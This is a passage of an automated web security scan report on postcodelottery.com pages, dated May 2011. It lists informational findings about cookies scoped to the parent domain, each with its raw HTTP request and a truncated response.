Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsnjci453g20ax45pj1enb55; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.160. http://www.postcodelottery.com/AboutUs.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:47 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:47 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16632

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.161. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/PrivacyPolicy.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/PrivacyPolicy.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...

11.162. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/TermsAndConditions.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/TermsAndConditions.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:30 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...

11.163. http://www.postcodelottery.com/Charities.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Charities.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Charities.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:33 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:34 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 22665

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.164. http://www.postcodelottery.com/DrawResults.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /DrawResults.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DrawResults.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:26 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 20168

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.165. http://www.postcodelottery.com/FunGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:34 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:35 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11179

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.166. http://www.postcodelottery.com/FunGames/FreeGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/FreeGames.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/FreeGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12413

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.167. http://www.postcodelottery.com/FunGames/PaidGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11318

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.168. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames/PostcodeLotteryScratch.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.route1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 15840

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.169. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PostcodeChallenge.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PostcodeChallenge.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:46 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10718

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.170. http://www.postcodelottery.com/Games/Scratchcards.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Games/Scratchcards.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Games/Scratchcards.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 11:41:43 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:43 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Location: http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 0


11.171. http://www.postcodelottery.com/Home.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Home.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:12 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 14838

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.172. http://www.postcodelottery.com/HowItWorks.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /HowItWorks.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HowItWorks.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:19 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 15444

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.173. http://www.postcodelottery.com/MyAccount.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /MyAccount.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MyAccount.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:36 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16408

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

11.174. http://www.postcodelottery.com/RSS.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /RSS.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RSS.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/xml;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 76958

<?xml version="1.0" ?>
<rss version="2.0">
                       <channel>
   <title>RSS</title>
   <link>http://www.postcodelottery.com/RSS.htm</link>
   <description></description>
           <item>
               <title>A Breath Of Fres
...[SNIP]...

11.175. http://www.postcodelottery.com/Sitemap.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Sitemap.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sitemap.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:39 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10146

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.176. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PlayNOW/OrderYourTickets.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
